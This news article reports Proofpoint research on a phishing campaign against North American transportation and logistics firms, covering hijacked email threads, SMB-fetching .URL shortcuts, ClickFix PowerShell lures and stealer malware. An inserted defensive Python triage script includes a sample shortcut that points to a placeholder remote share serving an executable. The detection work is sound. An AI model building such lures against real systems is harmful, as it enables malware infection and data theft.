25 September 2024

North American transportation and logistics firms hit with a new phishing campaign


Transportation and logistics companies across North America have become the focus of a sophisticated phishing campaign, delivering a variety of information stealers and remote access trojans (RATs). According to security researchers at Proofpoint, the attackers are leveraging compromised legitimate email accounts to insert malicious content into existing email conversations.

Proofpoint said it has identified at least 15 breached email accounts used to carry out these attacks. The accounts belong to transportation and shipping companies, which makes the phishing messages appear even more legitimate. However, it remains unclear how the attackers initially gained access to these email accounts or who is orchestrating the campaign.

The activity, observed between May and July 2024, predominantly involved malware such as Lumma Stealer, StealC, and NetSupport. In August 2024, the threat actor shifted tactics, employing new infrastructure and a new delivery method. In addition, the malware payloads expanded to include DanaBot and Arechclient2.

One of the primary tactics used by the attackers involves sending phishing messages containing URLs linked to Google Drive. The malicious URLs lead to an internet shortcut file (.URL), or in some cases, the file is directly attached to the message. When the victim opens the file, it leverages Server Message Block (SMB) to access and execute malware from a remote server, installing the malicious software on the victim's system.
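A small triage script for the Internet Shortcut (.URL) lure described above, added here as an illustrative example and not code from Proofpoint's report: it parses a .URL file and flags a URL= target that points at a remote SMB/UNC share rather than a web address. The sample file contents and the 203.0.113.10 host are constructed placeholders.

```python
"""Triage Windows Internet Shortcut (.URL) files for remote SMB/UNC targets."""
import re

# Constructed samples: a benign web shortcut and one pointing at a remote share.
BENIGN_URL_FILE = "[InternetShortcut]\r\nURL=https://example.com/portal\r\n"
SUSPECT_URL_FILE = (
    "[InternetShortcut]\r\n"
    "URL=file://\\\\203.0.113.10\\share\\invoice.exe\r\n"  # placeholder host
    "IconIndex=0\r\n"
)
EXEC_EXTS = {"exe", "dll", "msi", "bat", "cmd", "js", "vbs", "scr", "ps1"}


def parse_url_file(text: str) -> dict:
    """Return key=value pairs from the [InternetShortcut] section (keys lowercased)."""
    fields, in_section = {}, False
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(";"):
            continue  # blank or INI comment
        if line.startswith("[") and line.endswith("]"):
            in_section = line.lower() == "[internetshortcut]"
            continue
        if in_section and "=" in line:
            key, _, value = line.partition("=")
            fields[key.strip().lower()] = value.strip()
    return fields


def smb_target(url: str):
    """Return the remote host if the URL resolves over SMB/UNC, otherwise None."""
    u = url.strip()
    if u.startswith("\\\\"):  # raw UNC path: \\host\share\file
        return u[2:].split("\\", 1)[0]
    if u.lower().startswith("file:"):
        # Handles file://\\host\share, file:////host/share and file://host/share;
        # file:///C:/... is a local path and is not flagged.
        rest = u[len("file:"):].lstrip("/").lstrip("\\")
        host = re.split(r"[\\/]", rest, 1)[0]
        if host and host.lower() != "localhost" and not re.fullmatch(r"[A-Za-z]:", host):
            return host
    return None


def triage(text: str) -> dict:
    """Summarise one .URL file: its target, any SMB host, and whether to escalate."""
    target = parse_url_file(text).get("url", "")
    host = smb_target(target)
    ext = target.lower().rsplit(".", 1)[-1] if "." in target else ""
    return {"url": target, "smb_host": host, "executable": ext in EXEC_EXTS,
            "suspicious": host is not None}
```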

Proofpoint notes that most phishing campaigns are relatively small, involving fewer than 20 emails, but they specifically target companies within the transportation and logistics sector.

The attackers were also observed using a method known as ‘ClickFix’ for malware distribution. The technique relies on tricking users into copying, pasting, and executing a Base64-encoded PowerShell script found in the HTML of phishing emails. The script ultimately leads to the download of an MSI file used to install DanaBot.

In a bid to appear more credible, the threat actors have impersonated well-known software used in transportation and logistics operations, including Samsara, AMB Logistic, and Astra TMS.

While Proofpoint has not attributed the analyzed campaign to any specific threat actor, the researchers believe that the culprit behind it is financially motivated.

